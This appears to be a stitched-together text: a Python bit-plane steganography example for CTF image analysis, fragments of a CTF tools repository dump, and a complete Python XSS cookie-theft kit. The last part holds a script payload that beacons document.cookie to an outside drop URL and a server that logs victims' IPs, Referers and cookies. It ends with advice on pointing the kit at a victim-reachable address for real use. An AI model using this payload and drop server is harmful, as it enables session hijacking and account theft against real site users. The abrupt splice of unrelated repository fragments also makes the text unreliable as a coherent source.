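What "looking at an image plane by plane" in Stegsolve or Steganabara actually computes, and the simplest LSB embedding that such a view catches, as an added Python example (not part of Stegsolve, Steganabara or steghide; steghide's own passphrase-driven scheme is different and is not what is implemented here). It works on raw 8-bit samples so it runs without an image library: the cover `COVER`, the message `SECRET`, the 32-bit length prefix and the function names are all assumptions of this example. On a smooth gradient, plane 0 is a clean alternating stripe pattern; after embedding, the start of that plane turns into the noise you would spot in a plane view.

```python
# Constructed cover: a repeating 0..255 ramp, i.e. a smooth gradient whose plane 0
# is a clean 0,1,0,1,... stripe pattern before anything is hidden in it.
COVER = bytes(range(256)) * 4
SECRET = b"flag{planes}"          # constructed sample message


def bit_plane(samples, plane):
    """Plane `plane` of every sample (0 = LSB, 7 = MSB), one bit per sample.
    Rendered as black/white pixels this is what a plane view shows."""
    return [(s >> plane) & 1 for s in samples]


def max_run(bits):
    """Longest run of equal bits: a gradient's plane 0 alternates (run 1),
    embedded data breaks that regularity."""
    best = run = 1
    for prev, cur in zip(bits, bits[1:]):
        run = run + 1 if cur == prev else 1
        best = max(best, run)
    return best


def plane_report(samples):
    """Per plane: fraction of 1 bits and longest run, to see which planes look
    like structure and which look like noise (suspicious in a smooth cover)."""
    return {p: (sum(bit_plane(samples, p)) / len(samples),
                max_run(bit_plane(samples, p)))
            for p in range(8)}


def embed_lsb(cover, message):
    """Write a 32-bit big-endian length, then the message, into plane 0."""
    payload = len(message).to_bytes(4, "big") + message
    bits = [(byte >> (7 - i)) & 1 for byte in payload for i in range(8)]
    if len(bits) > len(cover):
        raise ValueError("cover holds %d bits, need %d" % (len(cover), len(bits)))
    out = bytearray(cover)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | bit      # only the LSB changes, by at most 1
    return bytes(out)


def bits_to_bytes(bits):
    """Pack bits (MSB first) into bytes; a trailing partial byte is dropped."""
    return bytes(int("".join(map(str, bits[i:i + 8])), 2)
                 for i in range(0, len(bits) - len(bits) % 8, 8))


def extract_lsb(stego):
    """Read plane 0 back: the length prefix first, then that many bytes."""
    bits = bit_plane(stego, 0)
    length = int.from_bytes(bits_to_bytes(bits[:32]), "big")
    return bits_to_bytes(bits[32:32 + 8 * length])


if __name__ == "__main__":
    stego = embed_lsb(COVER, SECRET)
    print("recovered:", extract_lsb(stego))
    for plane, (ones, run) in plane_report(stego).items():
        print("plane %d: ones=%.3f longest run=%d" % (plane, ones, run))
```

The high planes are untouched by the embedding (plane 7 of the ramp keeps its 128-sample runs), every sample moves by at most one level, and yet plane 0 goes from a longest run of 1 to a run of 28 zero bits at the very start: the length prefix. That contrast is the reason to inspect plane 0 first in a plane viewer.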
5 | 6 | Reference usage 7 | --------------- 8 | 9 | [TODO / QName](writeupurl) -------------------------------------------------------------------------------- /stego/stegsolve/Stegsolve.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TeamColonelPanic/tools/47e679532392a4fcf81b0547a84a83be4bdb2d92/stego/stegsolve/Stegsolve.jar -------------------------------------------------------------------------------- /template/README.md: -------------------------------------------------------------------------------- 1 | TOOLNAME 2 | ======== 3 | 4 | [TOOLNAME](url) can be used to DOWHAT. 5 | 6 | ``` 7 | example usage 8 | ``` 9 | 10 | Reference usage 11 | --------------- 12 | 13 | [XYZ CTF 9999 / QName](writeupurl) -------------------------------------------------------------------------------- /xss/README.md: -------------------------------------------------------------------------------- 1 | XSS 2 | === 3 | 4 | [ColonelPanic Dropper](http://colonelpanic.host-ed.me/) can be used as a drop point for data exfiltrated through XSS injections. 5 | 6 | An injected payload can send information such as `document.cookie` to the dropper (an image beacon with the value in the query string is enough) and you read it from the dropped txt file later on. Cookies flagged `HttpOnly` are not readable from script, so only what the page's own JavaScript can see gets captured. 7 | 8 | BTW, the OWASP [XSS Filter Evasion Cheat Sheet](https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet) lists many filter evasion techniques. 9 | --------------------------------------------------------------------------------
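A minimal drop point of the kind the XSS README describes, as an added Python example using only the standard library (this is not the ColonelPanic Dropper's code, which the page does not show). The injected script beacons `document.cookie` to `/drop?c=...` through an `<img>` request, and the server appends client address, Referer and the value to a text file you read later. The route `/drop`, the file name `dropped.txt`, the 1x1 GIF reply and the sample cookie are assumptions of this example.

```python
import os
import tempfile
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# 1x1 transparent GIF: answering the beacon with a real image keeps an
# <img>-based payload from leaving a broken-image icon on the victim page.
PIXEL = (b"\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00"
         b"\xff\xff\xff\x21\xf9\x04\x01\x00\x00\x00\x00\x2c\x00\x00\x00\x00"
         b"\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3b")


def js_payload(drop_url):
    """The injected script: beacon document.cookie to the drop point as a
    query parameter. Cookies flagged HttpOnly are not visible to script."""
    return ('<script>new Image().src="%s?c="+encodeURIComponent(document.cookie);'
            '</script>' % drop_url)


def parse_drop(path, client_ip, referer="-"):
    """Turn one request on /drop into a log line, or None for any other path."""
    url = urllib.parse.urlsplit(path)
    if url.path != "/drop":
        return None
    params = urllib.parse.parse_qs(url.query)
    return "%s %s %s" % (client_ip, referer, " ".join(params.get("c", [])))


class DropHandler(BaseHTTPRequestHandler):
    log_path = "dropped.txt"        # assumed name of the "dropped txt file"

    def do_GET(self):
        line = parse_drop(self.path, self.client_address[0],
                          self.headers.get("Referer", "-"))
        if line is not None:
            with open(self.log_path, "a", encoding="utf-8") as fh:
                fh.write(line + "\n")
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.send_header("Content-Length", str(len(PIXEL)))
        self.end_headers()
        self.wfile.write(PIXEL)

    def log_message(self, *args):   # keep the console quiet
        pass


def start_drop_server(log_path, port=0):
    """Serve on 127.0.0.1 (port 0 picks a free one) in a daemon thread."""
    handler = type("Handler", (DropHandler,), {"log_path": log_path})
    srv = HTTPServer(("127.0.0.1", port), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def demo():
    """Play the victim's browser against a local drop point and return the
    dropped lines; uses a temporary file instead of dropped.txt."""
    fd, log_path = tempfile.mkstemp(suffix=".txt")
    os.close(fd)
    srv = start_drop_server(log_path)
    try:
        host, port = srv.server_address
        cookie = "PHPSESSID=deadbeef; user=alice"        # constructed sample
        beacon = "http://%s:%d/drop?c=%s" % (host, port, urllib.parse.quote(cookie))
        urllib.request.urlopen(beacon, timeout=5).read()
        with open(log_path, encoding="utf-8") as fh:
            return [line.rstrip("\n") for line in fh]
    finally:
        srv.shutdown()
        srv.server_close()
        os.unlink(log_path)


if __name__ == "__main__":
    print(js_payload("http://127.0.0.1:8000/drop"))
    for line in demo():
        print("dropped:", line)
```

`demo()` is the whole exchange end to end: it starts the drop server, issues the same request the beacon would, and returns the log line `127.0.0.1 - PHPSESSID=deadbeef; user=alice`. For a real engagement the server binds an address the victim can reach and `js_payload()` gets that URL; everything that is not HttpOnly shows up in the file.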